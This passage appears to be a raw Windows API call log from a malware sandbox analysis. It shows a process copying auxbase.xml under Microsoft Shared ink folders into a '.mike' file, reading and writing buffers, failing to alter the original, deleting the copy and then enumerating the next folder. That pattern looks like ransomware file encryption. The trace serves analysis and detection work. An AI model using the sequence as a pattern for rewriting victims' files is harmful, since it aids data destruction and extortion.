(dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.601] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x213acac | out: lpFileInformation=0x213acac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a)) returned 1 [0045.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x213aff4 | out: lpFileInformation=0x213aff4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a)) returned 1 [0045.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.609] GetFileType (hFile=0x264) returned 0x1 [0045.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.609] GetFileType (hFile=0x264) returned 0x1 [0045.609] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.609] WriteFile (in: hFile=0x264, lpBuffer=0x213bfb0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x213bfb0*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.610] CloseHandle (hObject=0x264) returned 1 [0045.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.610] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x213ba6c | out: lpFileInformation=0x213ba6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a)) returned 1 [0045.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.611] GetFileType (hFile=0x264) returned 0x1 [0045.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.611] GetFileType (hFile=0x264) returned 0x1 [0045.611] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.611] ReadFile (in: hFile=0x264, lpBuffer=0x213d0f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x213d0f0*, lpNumberOfBytesRead=0x2af038*=0x59a, lpOverlapped=0x0) returned 1 [0045.612] CloseHandle (hObject=0x264) returned 1 [0045.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.613] GetFileType (hFile=0x264) returned 0x1 [0045.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.613] GetFileType (hFile=0x264) returned 0x1 [0045.613] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.613] WriteFile (in: hFile=0x264, lpBuffer=0x214215c*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x214215c*, lpNumberOfBytesWritten=0x2af02c*=0x5a0, lpOverlapped=0x0) returned 1 [0045.613] CloseHandle (hObject=0x264) returned 1 [0045.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.614] GetFileType (hFile=0x264) returned 0x1 [0045.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.614] GetFileType (hFile=0x264) returned 0x1 [0045.615] WriteFile (in: hFile=0x264, lpBuffer=0x21453a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21453a0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.615] CloseHandle (hObject=0x264) returned 1 [0045.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5637320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5637320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5637320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0045.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.617] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2146bd4 | out: lpFileInformation=0x2146bd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5637320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5637320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5637320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0045.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.617] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", dwFileAttributes=0x80) returned 0 [0045.618] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.618] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.618] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5637320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5637320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5637320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0045.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.618] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.618] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike", lpFilePart=0x0) returned 0x58 [0045.618] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.mike")) returned 1 [0045.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0045.619] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpFilePart=0x0) returned 0x47 [0045.619] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\", lpFilePart=0x0) returned 0x48 [0045.619] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5637320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe565d480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5637320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe565d480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0045.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 0 [0045.620] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0045.620] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpFilePart=0x0) returned 0x47 [0045.620] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.620] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.620] CoTaskMemFree (pv=0x4fe370) [0045.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpFilePart=0x0) returned 0x47 [0045.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0045.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpFilePart=0x0) returned 0x47 [0045.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\", lpFilePart=0x0) returned 0x48 [0045.621] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0045.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0045.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, 